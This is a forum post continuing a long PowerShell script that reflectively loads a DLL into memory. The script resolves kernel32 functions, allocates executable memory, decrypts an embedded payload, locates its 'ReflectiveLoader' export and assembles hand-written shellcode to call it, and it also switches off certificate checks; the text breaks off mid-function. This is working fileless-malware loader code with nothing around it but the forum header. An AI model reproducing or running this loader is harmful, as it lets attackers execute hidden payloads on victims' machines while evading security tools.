        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
 
        #Struct IMAGE_NT_HEADERS64
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
        $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
        
    #Struct IMAGE_NT_HEADERS32
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
        $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
 
        #Struct IMAGE_DOS_HEADER
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
        $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
 
        $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
        $e_resField.SetCustomAttribute($AttribBuilder)
 
        $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
 
        $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
        $e_res2Field.SetCustomAttribute($AttribBuilder)
 
        $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
        $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()   
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
 
    #Struct IMAGE_SECTION_HEADER
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
 
        $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
        $nameField.SetCustomAttribute($AttribBuilder)
 
        $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
 
        #Struct IMAGE_EXPORT_DIRECTORY
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
        $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
 
        return $Win32Types
    }
 
  Function Get-Win32Constants
    {
        $Win32Constants = New-Object System.Object
        
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name WAIT_TIMEOUT -Value 0x102
        
        return $Win32Constants
    }
0
bliver
1 / 1 / 0
Registered: 15.08.2017
Posts: 13
04.12.2017, 18:48  [OP] 7
continuation of the script
Function Is-Win64() 
  {
    return [IntPtr]::size -eq 8
  }
 
  Function Get-ProcAddress 
  {
      Param 
      (
          [Parameter(Position = 0, Mandatory = $True)] [String] $Module,
          [Parameter(Position = 1, Mandatory = $True)] [String] $Procedure
      )
 
      $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
          Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
      $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
      $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
      $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
      $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
      $tmpPtr = New-Object IntPtr
      $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
      return $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
  }
 
  Function Get-DelegateType
  {
      Param
      (
          [OutputType([Type])]
          [Parameter( Position = 0)]
          [Type[]]
          $Parameters = (New-Object Type[](0)),
          [Parameter( Position = 1 )]
          [Type]
          $ReturnType = [Void]
      )
 
      $Domain = [AppDomain]::CurrentDomain
      $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
      $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
      $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
      $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
      $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
      $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
      $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
      $MethodBuilder.SetImplementationFlags('Runtime, Managed')
        
      Write-Output $TypeBuilder.CreateType()
  }
 
  Function Get-NeccessaryFuncs
  {
      $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
      $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [Int], [Int], [Int]) ([IntPtr])
      $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
      #
      $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread
      $CreateThreadDelegate = Get-DelegateType @([IntPtr], [Int], [IntPtr], [IntPtr], [Int], [IntPtr]) ([IntPtr])
      $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name CreateThread -Value $CreateThread
      #
      $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
      $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int]) ([Int])
      $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
    #
    $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
      $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool])
      $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
    #
    $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
    $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
    $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
    #
    $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
    $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
    $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name GetProcAddress -Value $GetProcAddress
    #
    $TerminateThreadAddr = Get-ProcAddress kernel32.dll TerminateThread
    $TerminateThreadDelegate = Get-DelegateType @([IntPtr], [Uint32]) ([Bool])
    $TerminateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TerminateThreadAddr, $TerminateThreadDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name TerminateThread -Value $TerminateThread
  }
 
  Function Copy-ToUnmanagedMem
  {
      Param 
      (
          [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $UnmagedMemPointer,
          [Parameter(Position = 1, Mandatory = $True)] [Byte[]] $ByteArr,
          [Parameter(Position = 2, Mandatory = $True)] [Int] $UnmagedStartInd,
          [Parameter(Position = 3, Mandatory = $True)] [Int] $Size
      )
      for ($i = 0; $i -lt $Size; $i++)
      {
          [System.Runtime.InteropServices.Marshal]::WriteByte($UnmagedMemPointer, $i + $UnmagedStartInd, $ByteArr[$i])
      }
  }
 
  Function Convert-RVA2Offset([IntPtr]$Rva)
  {
    if ($PE64Bit)
    {
      $FirstSectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
    }
    else
    {
      $FirstSectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
    }
    #
    $FirstSectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FirstSectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
    #
    if ($Rva.ToInt64() -lt $FirstSectionHeader.PointerToRawData)
    {
      return $Rva
    }
    #
    for( $i = 0; $i -lt $NtHeadersInfo.FileHeader.NumberOfSections; $i++)
        {
            $SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$FirstSectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
      if (($Rva.ToInt64() -ge $SectionHeader.VirtualAddress) -and ($Rva.ToInt64() -lt (Add-SignedIntAsUnsigned $SectionHeader.VirtualAddress $SectionHeader.SizeOfRawData)))
      {
        return Add-SignedIntAsUnsigned (Sub-SignedIntAsUnsigned $Rva $SectionHeader.VirtualAddress) $SectionHeader.PointerToRawData
      }
        }
       
    return $null
  }
 
  Function Add-SignedIntAsUnsigned
    {
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )
        
        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
 
        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            $CarryOver = 0
            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
            {
                #Add bytes
                [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
 
                $FinalBytes[$i] = $Sum -band 0x00FF
                
                if (($Sum -band 0xFF00) -eq 0x100)
                {
                    $CarryOver = 1
                }
                else
                {
                    $CarryOver = 0
                }
            }
        }
        else
        {
            Throw "Cannot add bytearrays of different sizes"
        }
        
        return [BitConverter]::ToInt64($FinalBytes, 0)
    }
 
  Function Sub-SignedIntAsUnsigned
    {
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )
        
        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
 
        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            $CarryOver = 0
            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
            {
                $Val = $Value1Bytes[$i] - $CarryOver
                #Sub bytes
                if ($Val -lt $Value2Bytes[$i])
                {
                    $Val += 256
                    $CarryOver = 1
                }
                else
                {
                    $CarryOver = 0
                }
                
                
                [UInt16]$Sum = $Val - $Value2Bytes[$i]
 
                $FinalBytes[$i] = $Sum -band 0x00FF
            }
        }
        else
        {
            Throw "Cannot subtract bytearrays of different sizes"
        }
        
        return [BitConverter]::ToInt64($FinalBytes, 0)
    }
 
  Function Get-MemoryProcAddress
    {
        Param
    (
        [Parameter(Position = 0, Mandatory = $true)] [IntPtr]   $PEHandle,
        [Parameter(Position = 1, Mandatory = $true)] [String[]] $FunctionsNames
        )
        
        $Win32Types = Get-Win32Types
        $Win32Constants = Get-Win32Constants
    $PE64Bit = $null
    $NtHeadersInfo = $null
    ###
    #ImageNtHeaders
    $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
    $NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
    $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
    #
    if ($imageNtHeaders64.Signature -ne 0x00004550)
      {
          throw "Invalid IMAGE_NT_HEADER signature."
      }
    #
    if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
        {
            $NtHeadersInfo = $imageNtHeaders64
            $PE64Bit = $true
        }
        else
        {
            $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
            $NtHeadersInfo = $imageNtHeaders32
            $PE64Bit = $false
        }
    #
    if (($NtHeadersInfo.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -ne $Win32Constants.IMAGE_FILE_DLL)
        {
            Throw "PE file is not a DLL"
        }
    if (((Is-Win64) -and -not $PE64Bit) -or (-not (Is-Win64) -and $PE64Bit))
    {
      Throw "DLL file bitness and powershell process bitness not the same"
    }
    ####
    $FunctionsAddrss = New-Object IntPtr[] @($FunctionsNames).length
    ####
        if ($NtHeadersInfo.OptionalHeader.ExportTable.Size -eq 0)
        {
            return [IntPtr]::Zero
        }
    $ExportTablePtr = $NtHeadersInfo.OptionalHeader.ExportTable.VirtualAddress
    $ExportTableAddr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset $ExportTablePtr)
    if (-not $ExportTableAddr)
    {
      Throw "Can't find Export Table address"
    }
    #
        $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTableAddr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
        for ($Ind = 0; $Ind -lt $ExportTable.NumberOfNames; $Ind++)
        {
      $currOffset = . Convert-RVA2Offset (Add-SignedIntAsUnsigned $ExportTable.AddressOfNames  ($Ind * 4))
            $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($currOffset)
            $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32])))
      #"NamePtr - 0x{0:X0}" -f $NamePtr | Write-Host
            $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
      for ($NameInd = 0; $NameInd -lt @($FunctionsNames).length; $NameInd++)
      {
        $FunctionName = @($FunctionsNames)[$NameInd]
              if ($Name -match ".*?$FunctionName.*")
              {
                  $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset ($ExportTable.AddressOfNameOrdinals + ($Ind * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))))
                  $FuncIndex = . Convert-RVA2Offset ([System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16]))
                  $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset ($ExportTable.AddressOfFunctions + ($FuncIndex.ToInt32() * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))))
                  $FuncOffset =  . Convert-RVA2Offset ([System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32]))
                  $FunctionsAddrss[$NameInd] = Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
              }
      }
        }
        
        return $FunctionsAddrss
    }
 
  Function Generate-Bootstrap
  {
    Param
    (
      [Parameter(Position = 0, Mandatory = $True)] [HashTable]  $Opts
    )
    Function Local:ConvertTo-LittleEndian ([IntPtr] $Address, [Int] $Size = 0)
    {
      $LittleEndianByteArray = New-Object Byte[](0)
      $Address.ToString("X$(@{$True=[IntPtr]::size * 2; $False=$Size * 2}[$Size -eq 0])") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_)} }
      [System.Array]::Reverse($LittleEndianByteArray)
      Write-Output $LittleEndianByteArray
    }
 
    $CallStub = New-Object Byte[](0)
 
    if (Is-Win64)
    {
      [Byte[]] $CallStub = 0x68 #push userDataSize
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataSize 4 # userDataSize
      $CallStub += 0x48, 0x83, 0xEC, 0x20 #sub rsp, 0x20
      $CallStub += 0x48, 0xB9 #mov rcx, lpParam
      $CallStub += ConvertTo-LittleEndian $Opts.LpParam # lpParam
      $CallStub += 0x48, 0xBA #mov rdx, &imageBase
      $CallStub += ConvertTo-LittleEndian $Opts.ImageBaseAddr # &imageBase
      $CallStub += 0x41, 0xB8 #mov r8d, &funcHash
      $CallStub += ConvertTo-LittleEndian $Opts.FuncHash 4 # &funcHash
      $CallStub += 0x49, 0xB9 #mov r9, &userData
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataAddr # &userData
      $CallStub += 0x48, 0xB8 #mov rax, &reflectLoader
      $CallStub += ConvertTo-LittleEndian $Opts.ReflectLoaderAddr # &reflectLoader
      $CallStub += 0xFF, 0xD0 #call rax
      $CallStub += 0x48, 0x89, 0xC1 #mov rcx, rax (return code from ReflectiveLoader)
      $CallStub += 0x48, 0xB8 #mov rax, &exitThread
      $CallStub += ConvertTo-LittleEndian $Opts.ExitThreadAddr # &exitThread
      $CallStub += 0xFF, 0xD0 #call rax
    }
    else
    {
      [Byte[]] $CallStub = 0x68 #push userDataSize
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataSize # userDataSize
      $CallStub += 0x68 #push &userData
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataAddr # &userData
      $CallStub += 0x68 #push funcHash
      $CallStub += ConvertTo-LittleEndian $Opts.FuncHash # &funcHash
      $CallStub += 0x68 #push &imageBase
      $CallStub += ConvertTo-LittleEndian $Opts.ImageBaseAddr # &imageBase
      $CallStub += 0x68 #push lpParam
      $CallStub += ConvertTo-LittleEndian $Opts.LpParam # lpParam     
      $CallStub += 0xB8 #mov eax, &reflectLoader
      $CallStub += ConvertTo-LittleEndian $Opts.ReflectLoaderAddr # &reflectLoader
      $CallStub += 0xFF, 0xD0 #call eax
      $CallStub += 0x50 #push eax (return code from ReflectiveLoader)
      $CallStub += 0xB8 #mov eax, &exitThread
      $CallStub += ConvertTo-LittleEndian $Opts.ExitThreadAddr # &exitThread
      $CallStub += 0xFF, 0xD0 #call eax
    }
    $CallStub
  }
 
  Function Get-FunctionHash
  {
    Param
    (
      [Parameter(Position = 0, Mandatory = $True)] [string] $FuncName
    )
    function Local:bitshift 
    {
      Param
      (
        [Parameter(Mandatory = $True, Position=0)] [Int64] $x,
        [Parameter(ParameterSetName='Left')] [Int64] $Left,
        [Parameter(ParameterSetName='Right')] [Int64] $Right
      ) 
 
      $shift = if($PSCmdlet.ParameterSetName -eq 'Left')
      { 
          $Left
      }
      else
      {
          -$Right
      }
 
      return [math]::Floor($x * [math]::Pow(2, $shift))
    }
    Function Local:ror ($val, $r_bits, $max_bits) 
    {
      return ((bitshift ($val -band ([math]::Pow(2, $max_bits) - 1)) -Right ($r_bits % $max_bits)) -bor 
(bitshift $val -Left ($max_bits-($r_bits % $max_bits))) -band ([math]::Pow(2, $max_bits) - 1))
    }
 
    [Int64] $hash = 0
    
    for ($chNum = 0; $chNum -lt $FuncName.Length; $chNum++)
    { 
      $hash = ror $hash $HASH_KEY 32
      $hash += [Int32] $FuncName[$chNum]
    }
    $hash
  }
 
  #allow self-signed certs
  [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  #
  . Get-NeccessaryFuncs
  #
  $dllData = $arrexp
  
  try
  {
    if ($decFunc)
    {
      $dllData = $decFunc.Invoke($dllData, $decParams)
    }
    #
    $Win32Const = Get-Win32Constants
    $UserDataSize = @{$True=8; $False=4}[(Is-Win64)]
    #
    $AllocatedMemSize = [Math]::Max($dllData.Length + $UserDataSize + 1 + $BOOTSTRAP_MAX_LENGTH, 0x1000)
    [IntPtr]$PEHandle = $Win32Funcs.VirtualAlloc.Invoke([IntPtr]::Zero, $AllocatedMemSize, ($Win32Const.MEM_COMMIT -bor $Win32Const.MEM_RESERVE), $Win32Const.PAGE_EXECUTE_READWRITE)
    Copy-ToUnmanagedMem $PEHandle $dllData 0 $dllData.Length
    #
    $FuncAddr, $ReflectLoaderAddr = Get-MemoryProcAddress $PEHandle @($funcName, "ReflectiveLoader")
    if ($funcAddr -eq 0)
    {
     # Throw "Function '$funcName' not found in DLL export table!"
    }
    if ($ReflectLoaderAddr -eq 0)
    {
      Throw "Function 'ReflectiveLoader' not found in DLL export table!"
    }
    #
    
    
    $BootstrapOpts = @{
      UserDataSize = $UserDataSize;
      UserDataAddr = [Int64]$PEHandle + $dllData.Length;
      ImageBaseAddr = $PEHandle;
      FuncHash = Get-FunctionHash $funcName;
      LpParam = 0;
      LpParamPass = [Int64]$PEHandle + $dllData.Length + $UserDataSize;
      ReflectLoaderAddr = $ReflectLoaderAddr;
      ExitThreadAddr = $Win32Funcs.GetProcAddress.Invoke($Win32Funcs.GetModuleHandle.Invoke("kernel32.dll"), "ExitThread");
    }
    #
    
    $Bootsrap = Generate-Bootstrap $BootstrapOpts
    $BootstrapAddr = [Int64]$PEHandle + $dllData.Length + $UserDataSize + 1
    if ($DEBUG)
    {
      Write-Host ($BootstrapOpts | Out-String)
      Write-Host "Bootstrap size - ", $Bootsrap.Length
      Write-Host $Bootsrap
    }
    if ($Bootsrap.Length -gt $BOOTSTRAP_MAX_LENGTH)
    {
